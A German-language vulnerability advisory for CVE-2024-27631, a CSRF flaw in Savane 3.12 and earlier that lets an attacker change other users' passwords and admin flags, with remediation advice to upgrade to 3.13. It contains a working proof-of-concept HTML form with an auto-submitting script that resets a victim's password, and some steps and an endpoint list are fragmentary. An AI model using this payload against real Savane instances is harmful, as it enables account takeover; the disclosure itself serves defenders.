
CVE-2024–27631 Referenz
In Savane v3.12 und früher kann ein fehlender CSRF-Schutz bei administrativen Funktionen eine Privilegieneskalation und/oder die Übernahme von Konten ermöglichen. Insbesondere der Endpunkt /siteadmin/usergroup.php enthält die Funktionalität, Passwörter und administrative Flags anderer Benutzer zu ändern, wodurch ein Angreifer sich effektiv selbst zum Administrator machen kann.
Weitere nennenswerte Endpunkte, die anfällig für CSRF sind, sind:
CWE-Klassifizierung: CWE-352: Cross-Site Request Forgery (CSRF)
Gemeldet von: Ally Petitt
Betroffenes Produkt: Savane
Betroffene Versionen: 3.12 und früher
Dies ist ein Proof-of-Concept (PoC) zum Ändern des Passworts eines anderen Benutzerkontos als Weg zur Übernahme des Kontos.
/users/<username>).<savane_instance> durch die zutreffende Domain bzw. Host-Adresse.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1! am Konto des Opfers an.Beachten Sie, dass dieses PoC-Skript auf Firefox v103.0 (64-Bit) getestet wurde.
Aktualisieren Sie auf Savane Version 3.13 oder höher. Den Patch finden Sie hier.